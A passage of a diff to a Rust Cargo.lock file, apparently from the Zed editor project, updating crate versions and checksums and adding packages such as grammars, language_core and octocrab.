"workspace", ] +[[package]] +name = "gobject-sys" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dca35da0d19a18f4575f3cb99fe1c9e029a2941af5662f326f738a21edaf294" +dependencies = [ + "glib-sys", + "libc", + "system-deps 7.0.7", +] + [[package]] name = "goblin" -version = "0.8.2" +version = "0.9.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1b363a30c165f666402fe6a3024d3bec7ebc898f96a4a23bd1c99f8dbf3f4f47" +checksum = "daa0a64d21a7eb230583b4c5f4e23b7e4e57974f96620f42a7e75e08ae66d745" dependencies = [ "log", "plain", @@ -7398,7 +7456,7 @@ name = "google_ai" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -7454,7 +7512,6 @@ dependencies = [ "block", "cbindgen", "chrono", - "circular-buffer", "cocoa 0.26.0", "cocoa-foundation 0.2.0", "collections", @@ -7464,17 +7521,18 @@ dependencies = [ "core-text", "core-video", "ctor", - "derive_more 0.99.20", + "derive_more", "embed-resource", "env_logger 0.11.8", "etagere", "foreign-types 0.5.0", - "futures 0.3.31", + "futures 0.3.32", "futures-concurrency", "getrandom 0.3.4", "gpui_macros", "gpui_platform", "gpui_util", + "gpui_web", "http_client", "image", "inventory", @@ -7484,7 +7542,7 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga", + "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -7495,11 +7553,12 @@ dependencies = [ "pin-project", "pollster 0.4.0", "postage", - "pretty_assertions", "profiling", + "proptest", "rand 0.9.2", "raw-window-handle", "refineable", + "regex", "reqwest_client", "resvg", "scheduler", @@ -7515,6 +7574,7 @@ dependencies = [ "sum_tree", "taffy", "thiserror 2.0.17", + "ttf-parser 0.25.1", "unicode-segmentation", "url", "usvg", @@ -7541,7 +7601,7 @@ dependencies = [ "calloop-wayland-source", "collections", "filedescriptor", - "futures 0.3.31", + "futures 0.3.32", "gpui", 
"gpui_wgpu", "http_client", @@ -7581,7 +7641,6 @@ version = "0.1.0" dependencies = [ "anyhow", "async-task", - "bindgen 0.71.1", "block", "cbindgen", "cocoa 0.26.0", @@ -7592,10 +7651,11 @@ dependencies = [ "core-text", "core-video", "ctor", - "derive_more 0.99.20", + "derive_more", + "dispatch2", "etagere", "foreign-types 0.5.0", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "itertools 0.14.0", @@ -7605,6 +7665,7 @@ dependencies = [ "media", "metal", "objc", + "objc2-app-kit", "parking_lot", "pathfinder_geometry", "raw-window-handle", @@ -7624,7 +7685,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -7663,9 +7724,10 @@ version = "0.1.0" dependencies = [ "anyhow", "console_error_panic_hook", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_wgpu", + "http_client", "js-sys", "log", "parking_lot", @@ -7713,7 +7775,7 @@ dependencies = [ "anyhow", "collections", "etagere", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "itertools 0.14.0", @@ -7731,6 +7793,35 @@ dependencies = [ "zed-scap", ] +[[package]] +name = "grammars" +version = "0.1.0" +dependencies = [ + "anyhow", + "language_core", + "rust-embed", + "toml 0.8.23", + "tree-sitter", + "tree-sitter-bash", + "tree-sitter-c", + "tree-sitter-cpp", + "tree-sitter-css", + "tree-sitter-diff", + "tree-sitter-gitcommit", + "tree-sitter-go", + "tree-sitter-gomod", + "tree-sitter-gowork", + "tree-sitter-jsdoc", + "tree-sitter-json", + "tree-sitter-md", + "tree-sitter-python", + "tree-sitter-regex", + "tree-sitter-rust", + "tree-sitter-typescript", + "tree-sitter-yaml", + "util", +] + [[package]] name = "grid" version = "0.18.0" @@ -7843,6 +7934,15 @@ dependencies = [ "smallvec", ] +[[package]] +name = "hash32" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606" +dependencies = [ + "byteorder", +] + [[package]] name = "hashbrown" 
version = "0.12.3" @@ -7927,6 +8027,16 @@ dependencies = [ "http 0.2.12", ] +[[package]] +name = "heapless" +version = "0.9.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed" +dependencies = [ + "hash32", + "stable_deref_trait", +] + [[package]] name = "heck" version = "0.3.3" @@ -8051,7 +8161,7 @@ dependencies = [ "markup5ever 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8148,8 +8258,8 @@ dependencies = [ "async-fs", "async-tar", "bytes 1.11.1", - "derive_more 0.99.20", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "http 1.3.1", "http-body 1.0.1", "log", @@ -8266,11 +8376,25 @@ dependencies = [ "http 1.3.1", "hyper 1.7.0", "hyper-util", + "log", "rustls 0.23.33", "rustls-native-certs 0.8.2", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.2", + "tower-service", +] + +[[package]] +name = "hyper-timeout" +version = "0.5.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b90d566bffbce6a75bd8b09a05aa8c2cb1fabb6cb348f8840c9e4c90a0d83b0" +dependencies = [ + "hyper 1.7.0", + "hyper-util", + "pin-project-lite", + "tokio", "tower-service", ] @@ -8509,7 +8633,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3" dependencies = [ "byteorder-lite", - "quick-error", + "quick-error 2.0.1", ] [[package]] @@ -8526,7 +8650,7 @@ dependencies = [ "project", "serde", "settings", - "theme", + "theme_settings", "ui", "util", "workspace", @@ -8585,7 +8709,7 @@ checksum = "c727f80bfa4a6c6e2508d2f05b6f4bfce242030bd88ed15ae5331c5b5d30fba7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8642,7 +8766,7 @@ dependencies = [ "project", "serde_json", "serde_json_lenient", - "theme", + "theme_settings", "ui", "util", "util_macros", @@ -8680,7 +8804,7 @@ 
checksum = "c34819042dc3d3971c46c2190835914dfbe0c3c13f61449b2997f4e9722dfa60" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8872,7 +8996,7 @@ checksum = "03343451ff899767262ec32146f6d559dd759fdadf42ff0e227c7c48f72594b4" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8924,9 +9048,9 @@ dependencies = [ [[package]] name = "js-sys" -version = "0.3.81" +version = "0.3.90" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec48937a97411dcb524a265206ccd4c90bb711fca92b2792c407f268825b9305" +checksum = "14dc6f6450b3f6d4ed5b16327f38fed626d375a886159ca555bd7822c0c3a5a6" dependencies = [ "once_cell", "wasm-bindgen", @@ -8988,7 +9112,7 @@ dependencies = [ "bytecount", "data-encoding", "email_address", - "fancy-regex", + "fancy-regex 0.16.2", "fraction", "getrandom 0.3.4", "idna", @@ -9025,14 +9149,14 @@ dependencies = [ [[package]] name = "jupyter-protocol" -version = "1.2.1" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c75a69caf8b8e781224badfb76c4a8da4d49856de36ce72ae3cf5d4a1c94e42" +checksum = "4649647741f9794a7a02e3be976f1b248ba28a37dbfc626d5089316fd4fbf4c8" dependencies = [ "async-trait", "bytes 1.11.1", "chrono", - "futures 0.3.31", + "futures 0.3.32", "serde", "serde_json", "thiserror 2.0.17", @@ -9048,7 +9172,7 @@ dependencies = [ "anyhow", "async-trait", "async-tungstenite", - "futures 0.3.31", + "futures 0.3.32", "jupyter-protocol", "serde", "serde_json", @@ -9085,6 +9209,7 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "tree-sitter-json", "tree-sitter-rust", "ui", @@ -9159,12 +9284,13 @@ dependencies = [ "async-trait", "clock", "collections", + "criterion", "ctor", "diffy", "ec4rs", "encoding_rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "globset", "gpui", @@ -9172,6 +9298,7 @@ dependencies = [ "imara-diff", "indoc", "itertools 0.14.0", + "language_core", 
"log", "lsp", "parking_lot", @@ -9180,7 +9307,6 @@ dependencies = [ "rand 0.9.2", "regex", "rpc", - "schemars", "semver", "serde", "serde_json", @@ -9194,6 +9320,7 @@ dependencies = [ "task", "text", "theme", + "theme_settings", "toml 0.8.23", "tracing", "tree-sitter", @@ -9215,6 +9342,25 @@ dependencies = [ "ztracing", ] +[[package]] +name = "language_core" +version = "0.1.0" +dependencies = [ + "anyhow", + "collections", + "gpui", + "log", + "lsp", + "parking_lot", + "regex", + "schemars", + "serde", + "serde_json", + "toml 0.8.23", + "tree-sitter", + "util", +] + [[package]] name = "language_extension" version = "0.1.0" @@ -9224,7 +9370,7 @@ dependencies = [ "collections", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "language", "log", @@ -9244,13 +9390,13 @@ dependencies = [ "anthropic", "anyhow", "base64 0.22.1", - "client", "cloud_api_client", "cloud_api_types", "cloud_llm_client", "collections", "credentials_provider", - "futures 0.3.31", + "env_var", + "futures 0.3.32", "gpui", "http_client", "icons", @@ -9259,15 +9405,12 @@ dependencies = [ "open_ai", "open_router", "parking_lot", - "proto", "schemars", "serde", "serde_json", - "settings", "smol", "thiserror 2.0.17", "util", - "zed_env_vars", ] [[package]] @@ -9282,7 +9425,6 @@ dependencies = [ "aws_http_client", "base64 0.22.1", "bedrock", - "chrono", "client", "cloud_api_types", "cloud_llm_client", @@ -9294,11 +9436,10 @@ dependencies = [ "copilot_ui", "credentials_provider", "deepseek", - "editor", "extension", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "google_ai", "gpui", "gpui_tokio", @@ -9312,9 +9453,9 @@ dependencies = [ "ollama", "open_ai", "open_router", + "opencode", "partial-json-fixer", "pretty_assertions", - "project", "release_channel", "schemars", "semver", @@ -9375,7 +9516,7 @@ dependencies = [ "command_palette_hooks", "edit_prediction", "editor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", @@ -9390,6 +9531,7 @@ 
dependencies = [ "sysinfo 0.37.2", "telemetry", "theme", + "theme_settings", "tree-sitter", "ui", "util", @@ -9409,9 +9551,11 @@ dependencies = [ "async-trait", "chrono", "collections", - "futures 0.3.31", + "fs", + "futures 0.3.32", "globset", "gpui", + "grammars", "http_client", "itertools 0.14.0", "json_schema_store", @@ -9431,7 +9575,6 @@ dependencies = [ "project", "regex", "rope", - "rust-embed", "semver", "serde", "serde_json", @@ -9442,31 +9585,20 @@ dependencies = [ "snippet", "task", "terminal", - "text", "theme", - "toml 0.8.23", "tree-sitter", "tree-sitter-bash", "tree-sitter-c", "tree-sitter-cpp", "tree-sitter-css", - "tree-sitter-diff", "tree-sitter-gitcommit", "tree-sitter-go", - "tree-sitter-gomod", - "tree-sitter-gowork", - "tree-sitter-jsdoc", - "tree-sitter-json", - "tree-sitter-md", "tree-sitter-python", - "tree-sitter-regex", "tree-sitter-rust", "tree-sitter-typescript", - "tree-sitter-yaml", "unindent", "url", "util", - "workspace", ] [[package]] @@ -9511,11 +9643,17 @@ version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7a79a3332a6609480d7d0c9eab957bca6b455b91bb84e66d19f5ff66294b85b8" +[[package]] +name = "libbz2-rs-sys" +version = "0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2c4a545a15244c7d945065b5d392b2d2d7f21526fba56ce51467b06ed445e8f7" + [[package]] name = "libc" -version = "0.2.177" +version = "0.2.182" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2874a2af47a2325c2001a6e6fad9b16a53b802102b528163885171cf92b15976" +checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" [[package]] name = "libdbus-sys" @@ -9599,10 +9737,11 @@ dependencies = [ [[package]] name = "libwebrtc" -version = "0.3.10" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.26" +source = 
"git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "cxx", + "glib", "jni", "js-sys", "lazy_static", @@ -9696,9 +9835,12 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092" [[package]] name = "livekit" -version = "0.7.8" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.7.32" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "base64 0.22.1", + "bmrng", + "bytes 1.11.1", "chrono", "futures-util", "lazy_static", @@ -9719,11 +9861,12 @@ dependencies = [ [[package]] name = "livekit-api" -version = "0.4.2" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.4.14" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "base64 0.21.7", "futures-util", - "http 0.2.12", + "http 1.3.1", "livekit-protocol", "livekit-runtime", "log", @@ -9731,20 +9874,22 @@ dependencies = [ "pbjson-types", "prost 0.12.6", "rand 0.9.2", - "reqwest 0.11.27", + "reqwest 0.12.24", + "rustls-native-certs 0.6.3", "scopeguard", "serde", "sha2", "thiserror 1.0.69", "tokio", - "tokio-tungstenite 0.26.2", + "tokio-rustls 0.26.2", + "tokio-tungstenite 0.28.0", "url", ] [[package]] name = "livekit-protocol" -version = "0.3.9" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.7.1" +source = 
"git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "futures-util", "livekit-runtime", @@ -9752,7 +9897,6 @@ dependencies = [ "pbjson", "pbjson-types", "prost 0.12.6", - "prost-types 0.12.6", "serde", "thiserror 1.0.69", "tokio", @@ -9761,7 +9905,7 @@ dependencies = [ [[package]] name = "livekit-runtime" version = "0.4.0" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "tokio", "tokio-stream", @@ -9795,7 +9939,7 @@ dependencies = [ "core-video", "coreaudio-rs 0.12.1", "cpal", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", "gpui_tokio", @@ -9814,12 +9958,12 @@ dependencies = [ "serde_json", "serde_urlencoded", "settings", - "sha2", "simplelog", "smallvec", - "tokio-tungstenite 0.26.2", + "tokio", "ui", "util", + "webrtc-sys", "zed-scap", ] @@ -9839,7 +9983,7 @@ name = "lmstudio" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -9910,8 +10054,9 @@ dependencies = [ "async-pipe", "collections", "ctor", - "futures 0.3.31", + "futures 0.3.32", "gpui", + "gpui_util", "log", "lsp-types", "parking_lot", @@ -9929,7 +10074,7 @@ dependencies = [ [[package]] name = "lsp-types" version = "0.95.1" -source = "git+https://github.com/zed-industries/lsp-types?rev=a4f410987660bf560d1e617cb78117c6b6b9f599#a4f410987660bf560d1e617cb78117c6b6b9f599" +source = "git+https://github.com/zed-industries/lsp-types?rev=c7396459fefc7886b4adfa3b596832405ae1e880#c7396459fefc7886b4adfa3b596832405ae1e880" dependencies = [ "bitflags 1.3.2", "serde", @@ -10043,23 +10188,29 @@ checksum = 
"3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" name = "markdown" version = "0.1.0" dependencies = [ + "anyhow", "assets", "base64 0.22.1", "collections", "env_logger 0.11.8", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", + "html5ever 0.27.0", "language", "languages", "linkify", "log", + "markup5ever_rcdom", + "mermaid-rs-renderer", "node_runtime", "pulldown-cmark 0.13.0", "settings", + "stacksafe", "sum_tree", "theme", + "theme_settings", "ui", "util", ] @@ -10069,22 +10220,15 @@ name = "markdown_preview" version = "0.1.0" dependencies = [ "anyhow", - "async-recursion", - "collections", - "crashes", "editor", - "fs", "gpui", - "html5ever 0.27.0", "language", - "linkify", "log", - "markup5ever_rcdom", - "mermaid-rs-renderer", - "pretty_assertions", - "pulldown-cmark 0.13.0", + "markdown", + "project", "settings", - "theme", + "tempfile", + "theme_settings", "ui", "urlencoding", "util", @@ -10137,7 +10281,7 @@ checksum = "ac84fd3f360fcc43dc5f5d186f02a94192761a080e8bc58621ad4d12296a58cf" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -10297,7 +10441,7 @@ dependencies = [ [[package]] name = "mermaid-rs-renderer" version = "0.2.0" -source = "git+https://github.com/zed-industries/mermaid-rs-renderer?branch=fix-font-family-xml-escaping#d91961aa90bc7b0c09c87a13c91d48e2f05c468d" +source = "git+https://github.com/zed-industries/mermaid-rs-renderer?rev=374db9ead5426697c6c2111151d9f246899bc638#374db9ead5426697c6c2111151d9f246899bc638" dependencies = [ "anyhow", "fontdb 0.16.2", @@ -10371,9 +10515,9 @@ dependencies = [ [[package]] name = "minidump-common" -version = "0.21.2" +version = "0.26.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c4d14bcca0fd3ed165a03000480aaa364c6860c34e900cb2dafdf3b95340e77" +checksum = "2e16d10087ae9e375bad7a40e8ef5504bc08e808ccc6019067ff9de42a84570f" dependencies = [ "bitflags 2.10.0", "debugid", @@ -10386,14 +10530,16 @@ 
dependencies = [ [[package]] name = "minidump-writer" -version = "0.8.9" +version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e2abcd9c8a1e6e1e9d56ce3627851f39a17ea83e17c96bc510f29d7e43d78a7d" +checksum = "0e1fc14d6ded915b8e850801465e7096f77ed60bf87e4e85878d463720d9dc4d" dependencies = [ "bitflags 2.10.0", "byteorder", "cfg-if", "crash-context", + "error-graph", + "failspot", "goblin", "libc", "log", @@ -10401,18 +10547,20 @@ dependencies = [ "memmap2", "memoffset", "minidump-common", - "nix 0.28.0", + "nix 0.29.0", "procfs-core", "scroll", + "serde", + "serde_json", "tempfile", - "thiserror 1.0.69", + "thiserror 2.0.17", ] [[package]] name = "minidumper" -version = "0.8.3" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b4ebc9d1f8847ec1d078f78b35ed598e0ebefa1f242d5f83cd8d7f03960a7d1" +checksum = "10d9254e42a48098d045472a5c0cb892007a42e25342eddbf2642f6978bf381a" dependencies = [ "cfg-if", "crash-context", @@ -10422,7 +10570,7 @@ dependencies = [ "parking_lot", "polling", "scroll", - "thiserror 1.0.69", + "thiserror 2.0.17", "uds", ] @@ -10440,7 +10588,7 @@ dependencies = [ "rpc", "serde_json", "smol", - "theme", + "theme_settings", "util", "workspace", "zed_actions", @@ -10486,7 +10634,7 @@ version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "536bfad37a309d62069485248eeaba1e8d9853aaf951caaeaed0585a95346f08" dependencies = [ - "windows-sys 0.60.2", + "windows-sys 0.61.2", ] [[package]] @@ -10494,7 +10642,7 @@ name = "mistral" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -10555,7 +10703,6 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "project", "rand 0.9.2", "rope", "serde", @@ -10567,6 +10714,7 @@ dependencies = [ "theme", "tracing", "tree-sitter", + "unicode-segmentation", "util", "zlog", "ztracing", @@ -10579,23 +10727,41 @@ source = 
"registry+https://github.com/rust-lang/crates.io-index" checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" [[package]] -name = "multimap" -version = "0.10.1" +name = "naga" +version = "29.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d87ecb2933e8aeadb3e3a02b828fed80a7528047e68b4f424523a0981a3a084" +checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" +dependencies = [ + "arrayvec", + "bit-set 0.9.1", + "bitflags 2.10.0", + "cfg-if", + "cfg_aliases 0.2.1", + "codespan-reporting", + "half", + "hashbrown 0.16.1", + "hexf-parse", + "indexmap", + "libm", + "log", + "num-traits", + "once_cell", + "rustc-hash 1.1.0", + "thiserror 2.0.17", + "unicode-ident", +] [[package]] name = "naga" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -10647,9 +10813,9 @@ dependencies = [ [[package]] name = "nbformat" -version = "1.1.0" +version = "1.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b10a89a2d910233ec3fca4de359b16ebe95e833c8b2162643ef98c6053a0549d" +checksum = "d4983a40792c45e8639f77ef8e4461c55679cbc618f4b9e83830e8c7e79c8383" dependencies = [ "anyhow", "chrono", @@ -10665,7 +10831,7 @@ name = "nc" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "net", "smol", ] @@ -10761,7 +10927,7 @@ dependencies = [ "async-std", "async-tar", "async-trait", - "futures 0.3.31", + "futures 0.3.32", "http_client", "log", "paths", @@ -10815,12 +10981,10 @@ dependencies = [ "anyhow", 
"channel", "client", - "collections", "component", "db", "gpui", "rpc", - "settings", "sum_tree", "time", "ui", @@ -10896,7 +11060,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -10986,7 +11150,7 @@ checksum = "ed3955f1a9c7c0c15e092f9c887db08b1fc683305fdf6eb6684f22555355e202" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11069,7 +11233,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11087,7 +11251,7 @@ version = "0.9.2" source = "git+https://github.com/KillTheMule/nvim-rs?rev=764dd270c642f77f10f3e19d05cc178a6cbe69f3#764dd270c642f77f10f3e19d05cc178a6cbe69f3" dependencies = [ "async-trait", - "futures 0.3.31", + "futures 0.3.32", "log", "rmp", "rmpv", @@ -11126,10 +11290,20 @@ dependencies = [ ] [[package]] -name = "objc2-audio-toolbox" +name = "objc2-app-kit" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07" +checksum = "e6f29f568bec459b0ddff777cec4fe3fd8666d82d5a40ebd0ff7e66134f89bcc" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-audio-toolbox" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08" dependencies = [ "bitflags 2.10.0", "libc", @@ -11142,9 +11316,9 @@ dependencies = [ [[package]] name = "objc2-avf-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910" +checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be" dependencies = [ 
"objc2", "objc2-foundation", @@ -11152,9 +11326,9 @@ dependencies = [ [[package]] name = "objc2-core-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82" +checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2" dependencies = [ "dispatch2", "objc2", @@ -11194,9 +11368,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33" [[package]] name = "objc2-foundation" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c" +checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272" dependencies = [ "bitflags 2.10.0", "block2", @@ -11217,9 +11391,9 @@ dependencies = [ [[package]] name = "objc2-metal" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874" +checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794" dependencies = [ "bitflags 2.10.0", "block2", @@ -11229,6 +11403,19 @@ dependencies = [ "objc2-foundation", ] +[[package]] +name = "objc2-quartz-core" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f" +dependencies = [ + "bitflags 2.10.0", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", +] + [[package]] name = "objc_exception" version = "0.1.2" @@ -11249,9 +11436,9 @@ dependencies = [ [[package]] name = "object" -version = "0.36.7" +version = "0.37.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "62948e14d923ea95ea2c7c86c71013138b66525b86bdc08d2dcc262bdb497b87" +checksum = 
"ff76201f031d8863c38aa7f905eca4f53abbfa15f609db4277d44cd8938f33fe" dependencies = [ "crc32fast", "hashbrown 0.15.5", @@ -11260,12 +11447,45 @@ dependencies = [ ] [[package]] -name = "object" -version = "0.37.3" +name = "octocrab" +version = "0.49.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff76201f031d8863c38aa7f905eca4f53abbfa15f609db4277d44cd8938f33fe" +checksum = "63f6687a23731011d0117f9f4c3cdabaa7b5e42ca671f42b5cc0657c492540e3" dependencies = [ - "memchr", + "arc-swap", + "async-trait", + "base64 0.22.1", + "bytes 1.11.1", + "cargo_metadata 0.23.1", + "cfg-if", + "chrono", + "either", + "futures 0.3.32", + "futures-core", + "futures-util", + "getrandom 0.2.16", + "http 1.3.1", + "http-body 1.0.1", + "http-body-util", + "hyper 1.7.0", + "hyper-rustls 0.27.7", + "hyper-timeout", + "hyper-util", + "jsonwebtoken", + "once_cell", + "percent-encoding", + "pin-project", + "secrecy", + "serde", + "serde_json", + "serde_path_to_error", + "serde_urlencoded", + "snafu", + "tokio", + "tower 0.5.2", + "tower-http 0.6.6", + "url", + "web-time", ] [[package]] @@ -11273,7 +11493,7 @@ name = "ollama" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -11302,6 +11522,7 @@ dependencies = [ "settings", "telemetry", "theme", + "theme_settings", "ui", "util", "vim_mode_setting", @@ -11379,7 +11600,7 @@ name = "open_ai" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "log", "rand 0.9.2", @@ -11397,7 +11618,7 @@ version = "0.1.0" dependencies = [ "editor", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "picker", @@ -11407,6 +11628,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", "ui", "util", "workspace", @@ -11417,7 +11639,7 @@ name = "open_router" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ 
